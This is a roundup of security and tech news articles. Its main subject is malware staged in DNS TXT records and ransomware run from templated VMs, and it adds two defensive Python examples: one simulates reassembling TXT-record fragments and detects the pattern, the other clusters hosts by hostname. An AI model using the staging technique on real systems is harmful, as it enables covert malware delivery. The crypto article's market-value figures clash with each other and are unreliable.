
The Growing Threat of DNS Powered Email and Web Attacks


 

As an important component of the internet architecture, the Domain Name System has historically played the role of an invisible intermediary converting human intent into machine-readable destinations without much scrutiny or suspicion. However, this quiet confidence has now been put to the test. 

Research conducted by DomainTools has revealed a subtle yet consequential technique that redefines DNS into a covert delivery channel for malicious code rather than just a directory service. Rather than hosting payloads on compromised servers or suspicious domains, attackers fragment malware into tiny segments and embed them in DNS TXT records scattered across a variety of subdomains.

Each fragment looks harmless on its own, indistinguishable from legitimate configuration data. Once a script (PowerShell in the observed case) queries the records in sequence and concatenates the answers, the pieces form a fully functional payload. Because DNS traffic is implicitly trusted and many organizations have little visibility into it, this approach is cheap, methodical and quiet.

DNS infrastructure abuse of this kind is not merely theoretical; as Ars Technica reported, threat actors have operationalized it with notable precision. In the documented instance the payload was hex-encoded and split into hundreds of discrete chunks. The operators registered whitetreecollective.com, generated a large number of subdomains beneath it, and stored each fragment in the TXT record of a distinct subdomain.

Individually, these records look like the routine DNS metadata used to verify domain ownership, authenticate email (SPF, DKIM and DMARC records are all TXT records) and publish service configuration. Collectively they form a malware repository embedded in DNS itself. Once an initial foothold existed inside a target environment, reconstruction required nothing more conspicuous than a series of DNS queries.

Each encoded fragment was fetched by a scripted query and the payload was assembled in memory, with no conventional file download and no suspicious HTTP traffic. The retrieval blends into ordinary network activity because DNS requests are ubiquitous and rarely subjected to deep inspection; where clients use encrypted resolvers (DNS over HTTPS or DNS over TLS), the queries are hidden from network-level inspection entirely unless the enterprise controls the resolver.

Even though DNS tunneling has long been associated with data exfiltration and command-and-control communications, the deliberate hosting of malicious payloads across TXT records represents a more assertive evolution in this area. 

The campaign illustrates why comprehensive DNS telemetry, anomaly detection and policy enforcement belong in modern enterprise security architectures, and how foundational internet protocols, when inadequately monitored, can be repurposed into resilient delivery channels.
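The following is an added example, not the campaign's tooling or DomainTools' code, showing both halves of the technique described above: how hex-encoded fragments spread over numbered subdomains are pulled back together, and a detector that flags the resulting query pattern in resolver logs. The zone, the placeholder domain `staging.example`, the benign stand-in payload and the log lines (assumed format: client, query type, name, answer) are all constructed for illustration; no real campaign data is reproduced.

```python
"""Added example (not the campaign's own tooling): how hex-encoded payload
fragments staged in TXT records are reassembled, and a detector that flags the
query pattern in resolver logs.  The zone, domain name and log lines are all
constructed for illustration; no real campaign data is reproduced."""
import re
from collections import defaultdict

STAGED_DOMAIN = "staging.example"   # assumption: placeholder attacker domain
PAYLOAD = b"print('hello from the reassembled payload')"   # benign stand-in
CHUNK = 8                           # payload bytes per TXT record


def build_zone(payload: bytes, chunk: int = CHUNK) -> dict:
    """Hex-encode the payload and spread it over numbered subdomains, one
    fragment per TXT record, as the attacker's authoritative zone would."""
    hexed = payload.hex()
    step = 2 * chunk
    return {f"{i}.{STAGED_DOMAIN}": hexed[j:j + step]
            for i, j in enumerate(range(0, len(hexed), step))}


def reassemble(zone: dict) -> bytes:
    """What the retrieval script does: query each numbered record in order,
    concatenate the answers and hex-decode them in memory.  Here the 'queries'
    are dictionary lookups against the constructed zone."""
    parts = []
    i = 0
    while f"{i}.{STAGED_DOMAIN}" in zone:
        parts.append(zone[f"{i}.{STAGED_DOMAIN}"])
        i += 1
    return bytes.fromhex("".join(parts))


# Constructed resolver log lines.  Assumed format: client qtype qname answer.
# The TXT answers for staging.example are the fragments build_zone() produces
# for PAYLOAD; the other lines are ordinary lookups for contrast.
LOG = """\
10.0.0.5 TXT _dmarc.corp.example v=DMARC1;p=reject
10.0.0.7 TXT 0.staging.example 7072696e74282768
10.0.0.7 TXT 1.staging.example 656c6c6f2066726f
10.0.0.7 TXT 2.staging.example 6d20746865207265
10.0.0.7 TXT 3.staging.example 617373656d626c65
10.0.0.7 TXT 4.staging.example 64207061796c6f61
10.0.0.7 TXT 5.staging.example 642729
10.0.0.9 A www.corp.example 203.0.113.10
"""

HEX_ANSWER = re.compile(r"^[0-9a-fA-F]{16,}$")   # long, purely hex TXT answer


def registrable(qname: str) -> str:
    """Crude eTLD+1 (last two labels).  Enough for the example; a real
    detector should use the Public Suffix List."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_staging(log: str, min_subdomains: int = 4, min_hex: int = 3) -> dict:
    """Flag (client, domain) pairs that query TXT records on many distinct
    subdomains of one domain and mostly receive hex-looking answers.  Legitimate
    TXT use (SPF, DKIM, DMARC, verification tokens) rarely looks like this."""
    stats = defaultdict(lambda: {"subdomains": set(), "hex_answers": 0})
    for line in log.splitlines():
        client, qtype, qname, answer = line.split(maxsplit=3)
        if qtype != "TXT":
            continue
        entry = stats[(client, registrable(qname))]
        entry["subdomains"].add(qname)
        if HEX_ANSWER.match(answer):
            entry["hex_answers"] += 1
    return {key: val for key, val in stats.items()
            if len(val["subdomains"]) >= min_subdomains
            and val["hex_answers"] >= min_hex}


if __name__ == "__main__":
    zone = build_zone(PAYLOAD)
    assert reassemble(zone) == PAYLOAD
    for (client, domain), val in find_staging(LOG).items():
        print(f"{client} pulled {len(val['subdomains'])} TXT fragments "
              f"({val['hex_answers']} hex) from {domain}")
```

Note that the short final fragment does not match the hex pattern, which is why the detector counts distinct subdomains and hex answers separately and thresholds both: a client that hits many numbered subdomains of one domain with TXT queries is the signal, and the hex answers are corroboration. In production the same logic would run over the resolver's query log (or DoH/DoT logs from an enterprise-controlled resolver) with the Public Suffix List substituted for the two-label shortcut.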

Investigations into DNS-enabled threat infrastructure also revealed the activity of a threat actor tracked as Detour Dog, a key enabler of campaigns distributing the Strela Stealer malware. According to Infoblox analysis, the actor controls the domains hosting the initial component of the chain, a lightweight backdoor called StarFish, which is used to deliver the rest of the malware.

In the first stage the implant functions as a reverse shell, establishing a persistent channel through which the Strela Stealer payload is retrieved and executed. Infoblox has tracked Detour Dog since August 2023, when Sucuri, a company owned by GoDaddy, reported compromises of WordPress sites.

Early operations injected malicious JavaScript into compromised websites and used DNS TXT records as a covert command channel for a traffic distribution system; visitors were silently redirected to malicious or fraudulent pages.

Historical telemetry suggests the actor's infrastructure extends back as far as February 2020, and its operational model has matured since: where redirects once fed scams, a DNS-based command-and-control framework now permits staged execution of remote payloads.

According to IBM X-Force, StarFish is delivered through weaponized SVG files, giving the operators persistent, hands-on access to compromised systems. X-Force tracks the financially motivated group behind Strela Stealer as Hive0145, active since at least 2022 as the sole operator of the malware and functioning as an initial access broker that monetizes unauthorized network access by reselling it to other criminals.

Detour Dog's DNS infrastructure was further found to be involved in 69 percent of confirmed StarFish staging hosts, underscoring its central role in the broader campaign. The attack chain also included a MikroTik-based botnet, marketed as REM Proxy, armed with SystemBC malware previously analyzed by Black Lotus Labs at Lumen Technologies.

Alongside REM Proxy, the Tofsee botnet, which has historically propagated through the PrivateLoader C++ loader, was also responsible for spam emails that delivered Strela Stealer. Detour Dog's infrastructure consistently hosted the first-stage payload on both distribution paths, confirming its role as a DNS-centric facilitator within the Strela ecosystem.

When Detour Dog first appeared in threat intelligence reporting, its activity looked relatively simple: compromised websites redirected visitors to fraudulent advertising networks, scam sites and deceptive CAPTCHA pages designed to generate illicit revenue through forced clicks. By late 2024, however, telemetry indicated a strategic shift.

Infrastructure that began as a traffic monetization scheme became a distribution backbone for materially more dangerous payloads. In mid-2025 the DNS-centric framework was observed delivering Strela Stealer, an information-stealing malware family associated with the threat actor Hive0145.

Strela campaigns, usually initiated through malicious email attachments themed around invoices, exfiltrate user credentials, session data and host information stored in browsers. There is no indication that Detour Dog directly hosts the final-stage malware binaries.

Instead it appears to operate as a DNS relay layer: it resolves staged instructions and retrieves remote payloads from attacker-controlled servers, then relays them through compromised web assets. The indirection obscures the true origin of the malware and complicates static blocking. A full picture of Detour Dog's operation remains unclear, including whether it functions solely as an infrastructure provider or also runs campaigns of its own.

Analysis of infrastructure overlap and domain control indicates that Detour Dog has provided DNS channels to other operators, including Hive0145, for payload distribution. According to the researchers, nearly two-thirds of the staging domains associated with recent campaigns are controlled by Detour Dog, which points to a delivery-for-hire model rather than a single, isolated threat operation.

Email remains the primary entry point into the ecosystem. Malicious attachments masquerade as invoices or business documents and initiate a multi-stage infection. The documents do not embed the final payload; instead they reference compromised domains that query Detour Dog's name servers for further instructions.

Because a DNS lookup precedes remote execution, an apparently benign click becomes a covert, server-side retrieval and staging sequence. Mass distribution has been linked to botnets such as REM Proxy, the MikroTik-based network, and Tofsee, while Detour Dog provides persistent hosting and DNS command-and-control relays that shield the backend infrastructure from direct exposure.

This segmentation of responsibilities reflects the increasingly modular cybercriminal supply chain: one group manages spam dissemination, another provides resilient DNS and hosting infrastructure, and a third develops and operates the information-stealing payload. Such compartmentalization makes attribution and disruption difficult.

Removing a single component rarely dismantles an operation; actors can reconstitute infrastructure or redirect traffic in short order. Defensive strategies therefore need DNS-layer intelligence capable of detecting anomalous TXT record queries and covert command channels before downstream payload execution.

The example of Detour Dog demonstrates how foundational internet protocols can be used to deliver stealth payloads. It has been observed that threat actors embed malicious orchestration in routine DNS activity to transform everyday web traffic into an unobtrusive mechanism to deliver malware and exfiltrate data. 

To counter this class of threat, organizations should elevate DNS from a background utility to a frontline security control by integrating visibility, validation and enforcement across both the email and the resolution layers. The implications for security leaders extend beyond any single campaign or actor.

Adversaries have begun weaponizing core internet infrastructure in a structural way by combining email lures, DNS staging, and modular malware services. Defense systems based primarily on perimeter filtering and endpoint detection are unlikely to identify threats that arise through routine name resolution. 

In order to maintain DNS observability, organizations must implement a strategy that correlates resolver telemetry with email security signals, enforces strict egress policies, verifies record integrity, and integrates threat intelligence into recursive as well as authoritative layers. 

DNS configuration auditing, anomaly detection of irregular TXT record patterns, and rigorous segmentation of web-facing assets are three effective ways to reduce exposure. As adversaries continue to operationalize trusted protocols for covert delivery, resilience will increasingly rely on disciplined architectural design that treats DNS as a decisive defense line rather than a background infrastructure.

Conduent Data Breach Expands to Tens of Millions of Americans

 

A massive data breach at Conduent, a leading government technology contractor, has escalated dramatically and now affects tens of millions of Americans across multiple states. Detected in January 2025, the intrusion began with unauthorized access on October 21, 2024, meaning the attackers lurked undetected for nearly three months. Recent disclosures show the scope far exceeds early estimates, with Texas alone reporting 15.4 million victims, Oregon 10.5 million, and hundreds of thousands more in Washington, Maine and other states.

Conduent provides critical back-end services like payments, printing, and processing for state agencies, transit systems, and insurers serving over 100 million users nationwide. The stolen data trove includes highly sensitive details: names, Social Security numbers, dates of birth, medical records, health insurance IDs, and treatment information. This breach, linked to ransomware group SafePay, exposes victims to severe identity theft and fraud risks, prompting lawsuits and regulatory scrutiny.

The cyberattack disrupted operations briefly, delaying child support payments in states like Wisconsin and affecting insurers such as Premera Blue Cross and Blue Cross Blue Shield of Montana. Conduent, aided by Palo Alto Networks and other forensics experts, secured systems swiftly but incurred $25 million in direct response costs by Q1 2025. No misuse of data has surfaced as of late 2025 notifications, but experts warn of looming phishing and extortion campaigns.

Legal fallout has been swift, with at least nine class-action suits filed over the exposure of more than 10.5 million records, making it 2025's largest healthcare breach. Notifications began rolling out in October 2025 to state attorneys general in Maine, California and elsewhere, advising credit freezes and fraud alerts but not offering free monitoring. The victims, primarily beneficiaries of government programs, face heightened vulnerability in an era of persistent ransomware targeting public sector vendors.

Cybersecurity analysts highlight Conduent's prolonged undetected access as a stark reminder of supply chain risks in govtech. The firm's SEC filings underscore ongoing financial strain from notifications and potential liabilities. As investigations continue into 2026, this incident amplifies calls for stricter vendor oversight and zero-trust architectures in handling citizen data.

In response, affected states and insurers urge proactive measures: monitor credit reports, enable multi-factor authentication, and watch for suspicious IRS or healthcare scams. Conduent assures full cooperation with authorities, but the ballooning victim count underscores the fragility of centralized data troves in government services. This breach serves as a pivotal case study in evolving cyber threats to public infrastructure.

ISPsystem VMs Hijacked for Silent Ransomware Distribution


 

The evolution of cybercrime has led to infrastructure becoming less of a matter of ownership and more of a convenience issue. As opposed to investing time and resources in the construction and maintenance of dedicated command-and-control servers, ransomware operators are increasingly renting inexpensive virtual machines that blend seamlessly into legitimate hosting environments as a practical alternative. 

As a result of this shift, attackers have enhanced their operational strategy by embedding their activities within widely used infrastructure, thereby gaining scalability, plausible deniability, and operational resilience. 

In the event of the disruption of one node, dozens, sometimes hundreds, of nearly identical systems continue to run in parallel, ensuring that campaigns continue uninterrupted. 

Following this operational shift, Sophos investigators identified a series of recent WantToCry ransomware attacks launched from virtual machines provisioned through infrastructure managed by ISPsystem, a legitimate provider of virtualization and hosting control panels.

In forensic analysis of several incidents, researchers observed an underlying pattern: attackers controlled Windows virtual machines whose hostnames were the same. 

As the systems appeared to have been deployed using default Windows templates from ISPsystem's VMmanager platform, it can be deduced that threat actors were utilizing standardized rather than customized builds. 

Based on the correlation between telemetry and sinkhole data, it was found that the same hostname conventions were shared among infrastructures associated with multiple ransomware operations, including LockBit, Qilin, Conti, BlackCat, also known as ALPHV, and Ursnif, a banking trojan. In addition to ransomware, infrastructure overlaps with campaigns distributing information-stealing malware, such as RedLine and Lumma. 

A high frequency of identical system identifiers between geographically dispersed incidents indicates the reuse of templates rather than isolated deployments within the virtual environment. ISPsystem's VMmanager platform facilitates rapid provisioning and lifecycle management of Windows and Linux virtual machines, making it widely used by hosting providers. 

According to Sophos, the default Windows images in VMmanager use the same hostname and certain system identifiers upon deployment. Within benign environments, such uniformity may go unnoticed, while within hostile environments, it becomes a disguise.

The bulletproof hosting operators exploit this architectural feature by enabling their clients to instantiate virtual machines en masse, which allow malicious command-and-control and payload delivery servers to be embedded within pools of otherwise legitimate systems. The result is infrastructure dilution: malicious nodes become statistically indistinguishable from thousands of benign peers, resulting in a challenge in attribution efforts and a reduced likelihood of swift remediation. 

The distribution of these virtual machines across hosting providers was far from even. A significant proportion were traced to a small number of providers with a history of abuse complaints or regulatory scrutiny, including Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD and JSC IOT.

Researchers also identified MasterRDP as a recurrent element in the ecosystem, providing VPS and RDP services that are resistant to legal intervention while maintaining direct control over physical infrastructure. The Sophos analysis revealed that over 95 percent of ISPsystem virtual machines with internet-facing hostnames used one of four default Windows hostnames generated by ISPsystem's templates.

There was a correlation between each of these identifiers and detected cybercriminal activity, strengthening the assertion that templated infrastructure is being systematically repurposed to sustain large-scale ransomware and malware operations. 

After expanding their dataset, the researchers identified over 7,000 internet-facing servers sharing a single autogenerated hostname, spread across Russia, multiple European countries, the United States, Iran and Israel. According to Sophos' Counter Threat Unit, two hostnames in particular recurred consistently both in the WantToCry investigation and in general threat intelligence reporting.

The identifiers identified in this report were not restricted to one particular campaign. Observations from third parties and telemetry correlated them with operations involving LockBit, Qilin, and BlackCat, as well as NetSupport RAT deployments. 

These systems have served as command-and-control servers for ransomware, distribution points for secondary malware payloads, phishing infrastructure, botnet management nodes, and staging hosts for exfiltrated data awaiting monetization. Investigators believe this pattern of reusable infrastructure templates has persisted for at least five years.

Ironically, while the strategy reduces operational costs and speeds up deployment for threat actors, it also introduces a measurable signature. Because static hostnames are reused across thousands of ISPsystem-provisioned virtual machines, defenders can cluster hosts by hostname, and those clusters are useful for attribution and campaign tracking.
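As an added example, not Sophos' tooling, the following clusters internet-facing hosts by shared hostname, measures how much of a fleet a handful of hostnames covers, and pivots from one confirmed malicious IP to the other hosts carrying the same template hostname. The telemetry records are constructed; the hostnames (`WIN-TEMPLATE-A` and so on) are placeholders rather than the real VMmanager defaults, and the provider labels are fictitious.

```python
"""Added example (not Sophos' tooling): clustering internet-facing hosts by a
shared hostname to surface templated infrastructure, and pivoting from one
known-bad host to its template siblings.  All records are constructed; the
hostnames are placeholders, not the real VMmanager defaults, and the provider
labels are fictitious."""
from collections import Counter, defaultdict

# Constructed telemetry: (ip, hostname observed on the host, provider label)
RECORDS = [
    ("198.51.100.10", "WIN-TEMPLATE-A", "AS64500 hoster-one"),
    ("198.51.100.11", "WIN-TEMPLATE-A", "AS64500 hoster-one"),
    ("203.0.113.20", "win-template-a", "AS64501 hoster-two"),
    ("203.0.113.21", "WIN-TEMPLATE-A", "AS64501 hoster-two"),
    ("203.0.113.30", "WIN-TEMPLATE-B", "AS64501 hoster-two"),
    ("203.0.113.31", "WIN-TEMPLATE-B", "AS64501 hoster-two"),
    ("203.0.113.32", "WIN-TEMPLATE-B", "AS64501 hoster-two"),
    ("192.0.2.5", "mail.corp.example", "AS64502 enterprise"),
    ("192.0.2.6", "web01.corp.example", "AS64502 enterprise"),
]


def cluster_by_hostname(records):
    """Group hosts by case-normalized hostname."""
    clusters = defaultdict(list)
    for ip, host, provider in records:
        clusters[host.strip().upper()].append((ip, provider))
    return clusters


def template_clusters(records, min_hosts=3, min_providers=2):
    """Hostnames shared by many hosts across more than one provider are far
    more likely to be a deployment template artefact than one tenant's naming
    scheme.  Returns the clusters that cross both thresholds."""
    found = {}
    for host, members in cluster_by_hostname(records).items():
        providers = Counter(p for _, p in members)
        if len(members) >= min_hosts and len(providers) >= min_providers:
            found[host] = {"hosts": len(members), "providers": dict(providers)}
    return found


def top_hostname_share(records, k):
    """Fraction of all hosts carrying one of the k most common hostnames; the
    Sophos finding was that a handful of defaults covered most of the fleet."""
    counts = Counter(h.strip().upper() for _, h, _ in records)
    top = sum(n for _, n in counts.most_common(k))
    return top / len(records)


def pivot(records, seed_ip):
    """Attribution pivot: given one confirmed malicious IP, return its hostname
    and the other hosts that share it (candidates for the same campaign)."""
    for host, members in cluster_by_hostname(records).items():
        ips = {ip for ip, _ in members}
        if seed_ip in ips:
            return host, ips - {seed_ip}
    return None, set()


if __name__ == "__main__":
    for host, info in template_clusters(RECORDS).items():
        print(host, info)
    print(f"top-2 hostnames cover {top_hostname_share(RECORDS, 2):.0%} of hosts")
    print(pivot(RECORDS, "198.51.100.10"))
```

With the defaults, `WIN-TEMPLATE-B` is not reported because all three hosts sit with one provider, which could just be one tenant's naming convention; lowering `min_providers` to 1 surfaces it. A shared hostname is a lead, not a verdict: as the article notes, legitimate traffic also originates from these environments, so the pivot output should feed further enrichment rather than an automatic block.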

The virtual machines were traced to a narrow group of hosting providers, several of which have been repeatedly linked to cybercriminal or state-sponsored activity. Sophos notes that some legitimate traffic may originate from these environments, but additional intelligence identifies Stark Industries Solutions Ltd. as the most prominent provider.

Both Stark Industries Solutions and First Server Limited have been linked to cybercriminal ecosystems and to Russian state-sponsored operations. Stark Industries was established in early 2022, shortly before the Russian invasion of Ukraine, and regulatory scrutiny has followed; several threat groups have been observed using its infrastructure since then.

In May 2025 the Council of the European Union imposed restrictive measures on Stark Industries Solutions and its operators for their role in facilitating destabilizing activities by Russian state-affiliated actors.

First Server Limited has also drawn attention for its apparent connection with Doppelganger, a Russian disinformation campaign sanctioned by the UK government in October 2024. Sophos assesses that MasterRDP is one of a number of bulletproof hosting providers that lease ISPsystem-managed virtual machines on abuse-tolerant infrastructure to customers conducting ransomware and malware operations.

ISPsystem's VMmanager remains a viable and widely used virtualization management platform in the global hosting industry, according to researchers. The software itself is not inherently malicious; however, it is attractive to threat actors seeking scalable infrastructure due to its low cost, ease of onboarding, and rapid deployment capabilities. 

A combination of its widespread user base with its extensive ubiquity allows malicious deployments to maintain operational cover, enabling ransomware and malware campaigns to persist among thousands of routine, compliant virtual machine instances. As a result of these findings, the hosting ecosystem is facing a broader structural challenge. 

Because virtualization platforms lower the barrier to deploying infrastructure, more of the security responsibility lands on providers, resellers and enterprise customers: template hygiene must be enforced, unique system identifiers generated at provisioning time, and anomalous clustering patterns monitored.

Proactive hostname randomization, stronger customer vetting, transparency in abuse response and cross-industry intelligence sharing would all make templated infrastructure less attractive to threat actors.

As demonstrated by these consistent artifacts exposed in the campaign, even commoditized infrastructure leaves discernible patterns behind. It will not be sufficient to dismantle individual malicious nodes. Instead, it will be necessary to address the systemic weaknesses that allow legitimate technology to be silently adapted for large-scale, persistent cybercrime operations.

London Boroughs Struggle to Restore Services After November Cyber Attack




A cyber intrusion identified on November 24, 2025 has disrupted essential local authority services in two central London boroughs, freezing parts of the property market and delaying administrative functions.

The Royal Borough of Kensington and Chelsea and Westminster City Council have both been unable to operate several core systems since the breach was detected. Although Kensington and Chelsea is internationally associated with high-value homes, luxury retail outlets and tree-lined residential streets, routine civic operations in the borough are currently under strain.

A notice published on the Kensington and Chelsea council website states that disruption is expected to continue for several more weeks and that restoring all services may take months.

According to HM Land Registry figures, approximately 2,000 property transactions occur annually within Kensington and Chelsea. Many of those transactions are now impacted because the councils cannot conduct local authority searches. These searches are mandatory checks that examine planning history, land charges, infrastructure proposals and regulatory constraints linked to a property.

Nick Gregori, Head of Research at property data platform LonRes, explained that local authority searches are fundamental to the conveyancing process. Buyers relying on mortgage financing cannot secure loans without completed searches. Even purchasers using cash are advised to obtain them to ensure proper due diligence.

Jo Eccles, founder of buying agency Eccord, said two of her clients purchasing in Westminster have had to obtain indemnity insurance because official searches are not expected to resume until April due to accumulated delays. She noted that private banks are sometimes willing to proceed with indemnity-backed transactions, whereas retail lenders are generally less accommodating.

Robert Green, Head of Sales at John D Wood & Co. in Chelsea Green, stated that indemnity policies do not eliminate the need for careful investigation. Solicitors are attempting to reconstruct due diligence by reviewing historical documentation held by sellers or from previous acquisition files. Buyers without access to private lending or substantial liquidity are finding transactions extremely difficult to complete.

Planning services have also stalled. Architect Emily Ceraudo has two projects paused: one involving listed building consent in South Kensington and another concerning a mansard roof extension in Mayfair. She said clients initially struggled to accept that the entire planning system could remain offline for this duration, prompting her to share official correspondence confirming the cause of delay. Councils have indicated that some applications may be processed offline, but no revised timeframe has been provided.

There are reports of contractors reconsidering site activity and some clients contemplating proceeding with works in anticipation of retrospective approval.

Housing benefit payments were also interrupted. Laurence Turner, who rents a studio flat in Chelsea to an elderly tenant with medical needs, said he only became aware of the issue after two missed payments. He emphasized that he has no contractual relationship with the council and that his tenant had consistently paid rent early for five years. His letting agent, Maskells, contacted the council for clarification. Payments due in mid-December and mid-January were missed, leaving £2,870 outstanding before funds were eventually received.

Turner observed that council service charges were skipped once in mid-December but resumed in mid-January, whereas housing benefit was missed twice. He acknowledged that municipal financial systems are complex and that he may not see the full administrative context.

Neither borough has provided a definitive restoration date. Kensington and Chelsea stated that systems are being reactivated gradually under guidance from NCC Group, the Metropolitan Police and the National Cyber Security Centre. Property searches are expected to return as soon as possible, with a limited search service available before full restoration.

Council Leader Cllr Elizabeth Campbell described the incident as an intricate criminal cyber attack. She said prior investment in digital, data and technology infrastructure, including updated cyber defence systems, helped reduce the overall damage. She confirmed that the planning system is undergoing checks, that new planning applications cannot progress beyond validation, and that local land charge searches remain unavailable. She added that £10 million in housing benefits has been issued since the incident and that recovery work continues with specialist partners to ensure systems are restored safely and with strengthened resilience.

India Sees Rising Push for Limits on Children’s Social Media Access

 

A growing conversation around restricting social media access for children under 16 is gaining traction across India, with several state leaders reviewing regulatory models adopted overseas — particularly in Australia.

Ministers from at least two southern states have indicated that they are assessing whether prohibiting minors from using social media could effectively shield children from excessive online exposure.

Adding weight to the debate, the latest Economic Survey, an annual report prepared by a team led by India’s chief economic adviser, suggested that the central government explore age-based controls on children’s social media usage. While the survey does not mandate policy action, its recommendations often influence national discussions.

Australia’s Precedent Sparks Global Debate

Australia recently became the first nation to prohibit most social media platforms for users under 16. The law requires companies to verify users’ ages and deactivate accounts belonging to underage individuals.

The decision drew criticism from tech platforms. As Australia’s internet regulator told the BBC last month, companies responded to the framework "kicking and screaming - very very reluctantly".

Meanwhile, lawmakers in France have approved a bill in the lower house seeking to block social media access for children under 15; the proposal now awaits Senate approval. The United Kingdom is also evaluating similar measures.

In India, LSK Devarayalu of the Telugu Desam Party — which governs Andhra Pradesh and supports Prime Minister Narendra Modi’s federal coalition — introduced a private member’s bill proposing a ban on social media use for children under 16. Although such bills rarely become law, they can influence legislative debate.

Separately, the Andhra Pradesh government has formed a ministerial group to examine international regulatory models. It has also invited major technology firms, including Meta, X, Google and ShareChat, for consultations. The companies have yet to respond publicly.

State IT Minister Nara Lokesh recently wrote on X that children were "slipping into relentless usage" of social media, affecting their attention spans and academic performance.

"We will ensure social media becomes a safer space and reduce its damaging impact - especially for women and children," he added.

In Goa, Tourism and IT Minister Rohan Khaunte confirmed that authorities are studying whether such restrictions could be introduced, promising further details soon.

Similarly, Priyank Kharge, IT Minister of Karnataka — home to Bengaluru, often dubbed India’s Silicon Valley — informed the state assembly that discussions were underway on responsible artificial intelligence and social media use. He referenced a “digital detox” initiative launched in partnership with Meta, involving approximately 300,000 students and 100,000 teachers. However, he did not clarify whether legislative action was being considered.

Enforcement and Legal Hurdles

Experts caution that implementing such bans in India would be legally and technically complex.

Digital rights activist Nikhil Pahwa pointed out that enforcing state-level prohibitions could create jurisdictional conflicts. "While companies can infer users' locations through IP addresses, such systems are often inaccurate. Where state boundaries are very close, you can end up creating conflicts if one state bans social media use and another does not."

He also underscored the broader issue of age verification. "Age verification is not simple. To adhere to such bans, companies would effectively have to verify every individual using every service on the internet," Pahwa told the BBC.

Even in Australia, some minors reportedly bypass restrictions by entering false birth dates to create accounts.

According to Prateek Waghre, head of programmes at the Tech Global Institute, successful enforcement would hinge on platform cooperation.

"In theory, location can be inferred through IP addresses by internet service providers or technology companies, but whether the companies operating such apps would comply, or challenge such directions in court, is not yet clear," he says.

Broader Social Concerns

While lawmakers acknowledge the risks of excessive social media exposure, some analysts argue that a blanket ban may be too narrow a solution.

A recent survey of 1,277 Indian teenagers by a non-profit organisation found that many accounts are created with assistance from family members or friends and are often not tied to personal email addresses. This complicates assumptions of individual ownership central to age-verification systems.

Parents remain divided. Delhi resident Jitender Yadav, father of two young daughters, believes deeper issues are at play.

"Parents themselves fail to give enough time to children and hand them phones to keep them engaged - the problem starts there," he says.

"I am not sure if a social media ban will help. Because unless parents give enough time to their children or learn to keep them creatively engaged, they will always find ways to bypass such bans," he says.

As the discussion unfolds, India faces a complex balancing act — safeguarding children online while navigating legal, technological and social realities.

Cryptocurrency Market Slump Deepens Amid Global Tech Selloff and Risk-Off Sentiment


Now falling, the crypto market feels strain from turmoil spreading beyond tech stocks worldwide. As investors pull back sharply, digital currencies take a hit alongside firms that list Bitcoin on their books. When one part shakes, others follow - worry grows over how deeply losses might spread through finance and tech alike. 

A sharp drop hit Bitcoin lately, pushing prices toward their weakest point since early 2023. Down nearly 12 percent just yesterday, it now trades near sixty thousand dollars, according to figures on CoinMarketCap. Once hovering near seventy-two thousand, the descent has been relentless. Four months back, it stood at about one hundred twenty-six thousand - today, less than half remains. 

This plunge highlights how deeply the current market retreat is cutting. What stands clear is how ongoing sell-offs, paired with steady withdrawals from spot Bitcoin ETFs, weigh heavily on price direction. Around $60,000, any upward movement in Bitcoin has stalled - this pattern, according to Pi42's co-founder and chief executive, Avinash Shekhar, shapes a guarded mindset among investors. Each time gains slip away, trust in short-term rebound weakens. With swings growing sharper, hesitation lingers in trader behavior. 

Even after a steep drop, Bitcoin showed signs of steadiness around $65,000 by Friday morning in Indian markets. Still, the overall market value fell almost 9 per cent, landing near $1.3 trillion. Trading spiked dramatically - volume climbed more than 90 per cent - as approximately $143 billion in Bitcoin shifted in just one day. Around half of all cryptocurrency investors kept leaning toward major coins under pressure, with Bitcoin holding nearly a 58 per cent share. Stability returned slowly while trading intensity stayed high. Despite stronger signals elsewhere, wider economic pressures continue to cloud investor mood. 

According to Giottus chief executive Vikram Subburaj, conditions now reflect a typical pullback environment - liquidity shrinks while buyers hesitate and global concerns linger without resolution. When examined closely, shrinking exchange-traded fund flows along with strained blockchain metrics have together dampened appetite for crypto holdings, deepening the drop seen over recent seven-day periods. This drop marks the toughest stretch for digital currencies since last October, just ahead of Donald Trump securing the presidency amid pro-crypto signals throughout his run. 

Bitcoin is not alone in feeling the heat - Ethereum, BNB, Solana, XRP, Dogecoin, Cardano, and Bitcoin Cash all slid 9 to 13 percent in tandem. Sector-wide losses suggest a widespread pullback, not an isolated dip. Despite earlier momentum, confidence now appears fragile across major assets. After the plunge, crypto's overall market value sits near $2.22 trillion. That fall means losses exceeding $2 trillion since the high mark of about $4.39 trillion seen in October 2025, nearly half vanishing within only four weeks. Rather than stabilizing, investor mood has soured due to swings in metals like gold and silver - normally seen as secure - alongside slumping stock markets. 

Because of these shifts, appetite for risk-heavy assets has cooled noticeably. Despite weaker US job figures and rising worries over big spending in AI, the cryptocurrency space stays under pressure, says Akshat Siddhant of Mudrex. Because global markets show caution, downward trends hold firm for now. Yet, within this pullback, patient Bitcoin holders might find pockets of value worth watching closely. Though short-term volatility lingers, the broader downturn isn’t seen as a total barrier to strategic entry points. Following such dips carefully could matter more than reacting fast.

Fraudsters Use Postal Mail to Target Crypto Hardware Wallet Owners

Cybercriminals are using traditional mail services to target cryptocurrency users who own hardware wallets manufactured by Trezor and Ledger. The attackers are distributing printed letters that falsely present themselves as official security notifications and attempt to trick recipients into revealing their wallet recovery phrases.

The letters instruct users to complete a compulsory “Authentication Check” or “Transaction Check,” claiming this step will soon become mandatory. Recipients are warned that failure to comply before stated deadlines could result in disrupted wallet functionality. One Trezor-themed letter sets February 15, 2026 as the cutoff date, while a Ledger-branded version references October 15, 2025.

The correspondence appears professionally formatted and claims to originate from internal security or compliance departments. In a case shared publicly by cybersecurity researcher Dmitry Smilyanets, a Trezor-related letter stated that authentication would soon be enforced across devices and urged users to scan a QR code to prevent interruption of Trezor Suite access. The letter further asserted that even if users had already enabled authentication on their device, they must repeat the process to ensure full activation and synchronization of the feature.

The QR codes direct recipients to fraudulent domains including trezor.authentication-check[.]io and ledger.setuptransactioncheck[.]com. At the time of reporting, the Ledger-linked domain was inactive, while the Trezor-related site remained accessible but displayed a phishing warning from Cloudflare.

The Trezor-themed phishing page states that users must complete authentication by February 15, 2026 unless they purchased specific models, including Trezor Safe 7, Safe 5, Safe 3, or Safe 1, after November 30, 2025, in which case the feature is allegedly preconfigured. After selecting “Get Started,” users are warned that ignoring the process could lead to blocked access, transaction signing errors, and complications with future updates.

